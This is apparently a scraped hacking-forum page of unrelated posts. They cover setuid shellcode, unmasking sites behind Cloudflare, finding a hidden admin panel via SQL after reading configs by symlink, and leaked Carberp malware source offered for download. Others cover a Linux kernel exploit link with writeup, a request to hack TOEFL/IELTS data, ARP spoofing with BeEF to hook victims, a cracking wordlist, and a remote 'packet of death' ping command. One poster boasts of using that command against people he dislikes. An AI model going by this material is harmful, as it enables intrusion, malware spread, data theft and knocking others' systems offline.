SOLDIERX.COM Nobody Can Stop Information Insemination

I wrote the following x86 shellcode for a wargame and I thought I would share it here so you guys can mess with it. The shellcode calls setresuid first in order to execute with maximum privileges when you are exploiting a setuid binary. Then it calls execve to spawn a shell. This is probably the most basic shellcode and is only suitable for local exploitation.

Pseudocode:

Assembly:

To turn this assembly into usable shellcode you will have to assemble it into an ELF executable, and then extract the shellcode from that. You will need nasm to assemble the file:

You can then use objdump to dump the .text section (instructions) of the binary you just built:

There is an easy way to uncover someone's website hiding under cloudflare, just go to the url below and type your domain name and click on search:

http://www.cloudflare-watch.org/cfs.html

Enuff with some shit!

Hello Everybody

Today , I've New Way to get real admincp

When You Read Config { by Symlink Or Others }

You Get Like This
http://upload.traidnt.net/upfiles/4q708934.png

But when you try 2 browse /admincp you get

http://upload.traidnt.net/upfiles/7NQ09002.png

Okay 2 get real Admincp , Connect MySQL And Execute This Query

http://upload.traidnt.net/upfiles/e4W09043.png

Select location from session ;

And You'll Get The Real URL

http://upload.traidnt.net/upfiles/0rU09149.png

Real Admincp ; /1337b0x/

http://upload.traidnt.net/upfiles/Bdr09200.png

Zuhahahaha

Done Brothers

Greets 2 H4x04L1f3 // Shadow008 // Sniffer // Every Madleets Members

See You

./b0x

As many of you probably already know, the source code to Carberp malware has been leaked online. If you hadn't heard about this, please see http://www.pcworld.com/article/2042930/source-code-for-carberp-financial...

Due to the large number of emails we have received, we have put it in the VIP area at https://www.soldierx.com/sxonly/VIP-Downloads

Enjoy

Just in case you've been living under a rock, please grab it at http://grsecurity.net/~spender/exploits/enlightenment.tgz (abacus is the new exploit).

Here is a bit of a write up that appeared on reddit:
Vuln involves the event_id variable in kernel/events/core.c:perf_swevent_init(), which is a signed integer with only its upper bound checked. On close of the event, it will do:

The event_id (provided by the exploit) is used as a u64 here, creating an effective index > 2G and < 4G. Userland however could provide anything in the upper dword of event_id as long as the lower dword (the truncated part cast to an integer) is >= 0x80000000U.
The exploit provides a negative event_id, which when converted into an array index, combined with the location of the kernel in a 64bit address space, results in an address in userland within a reasonable range. The exploit prepares for this by mapping that range and filling it with known contents. The decrement performed by the kernel will then modify some data in the mapping, which the exploit will be able to find. An increment is also performed via the code below, but the indexes of -1 and -2 were likely chosen so as to not have this cause modification of anything important on the kernels tested.
By knowing the address of the modified data, the event_id provided to the kernel, and the size of the elements of the array being indexed, the exploit can compute the address of the base of the array. Then it acquires the IDT base and targets the overflow interrupt vector. Here it is targeting it with different code:

Saw an interesting link today about various places to sell exploit code to. Figured I would share it:

http://bugcrowd.com/list-of-bug-bounty-programs/

Does anybody have any thoughts/comments/opinions on selling exploits/bugs?

VERY URGENT!!! Is there anyone to help me to hack TOEFL or IELTS data. Your help will be highly apprecated.

I been trying forever to get a combo of ettercap "arp spoofing" and beef working. I have found one proxy that fits the bill but its slow "so slow in fact it makes it just about unusable" and will not always hook the victim into beef. Has anyone had success with something like this?

The handsome fellow at Defuse Security's Crackstation Project (It's a one-man operation) a couple days ago released a massive dictionary list on a PAY-WTF-YOU-WANT model:

That link again is: http://crackstation.net/buy-crackstation-wordlist-password-cracking-dict...

Since he tweeted it, here's the TPB torrent and magnet link in case of website issues:
https://thepiratebay.se/torrent/8159583
magnet:?xt=urn:btih:fd62cc1d79f595cbe1de6356fb13c2165994e469&dn=CrackStation.Password.Cracking.Dictionary&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.publicbt.com%3A80&tr=udp%3A%2F%2Ftracker.istole.it%3A6969&tr=udp%3A%2F%2Ftracker.ccc.de%3A80

Now, I know all you 1337 h4><0|2z out there probably have your own fantastical list that may be even better, but this is pretty awesome. If you can afford it, consider throwing this generous, manly man with a behemoth of an epeen $13.37 or even a scrumptious $1.34 (because rounding). He also takes bitcoins.

And yes, I'm plugging the shit out of this because I know half of you are going to grab this delicious, gourmet 15GB text file.

http://dshield.org/diary/Intel+Network+Card+82574L+Packet+of+Death/15109

Apparently only affects a gigabit controller using a specific intel chipset.

I ran this against a few chumps I dislike, one of them definately went down for the count.

=================================================================

An interesting blog post by Kristian Kielhofer describes how a specific SPI packet can "kill" an Intel Gigabit ethernet card [1]. If a card is exposed to this traffic, the system has to be physically power cycled. A reboot will not recover the system.

The network card crashed whenever the value 0x32 or 0x33 was found at offset 0x47f. Kristian first noticed this happening for specific SIP packets, but in the end, it turned out that any packet with 0x32 at 0x47f caused the crash. Intel traced the problem to an EEPROM used in this specific card (82574L). There are some links in the comment to the blog suggesting that others have run into this problem before. For example, the commend: "ping -p 32 -s 1110 x.x.x.x" can crash an affected card remotely.

[Update] A few asked why this doesn't happen just randomly every 128th packet: Once the card receives the value "0x34" in this position, it appears to be no longer vulnerable. There are also a number of earlier bug reports about this card that sound very similar, and appear to be related to ASPM, a PCI power safe feature. Kristian claims he eliminated this issue. if you try to reproduce this issue, power up the system and then issue the "ping" command shown above quickly after reboot in order to avoid the "inoculation" wiht 0x34. We would like to hear any reports of being able to reproduce (or not) this issue.

There are also some reports about similar issues in certain 3G USB modems.

[1] http://blog.krisk.org/2013/02/packets-of-death.html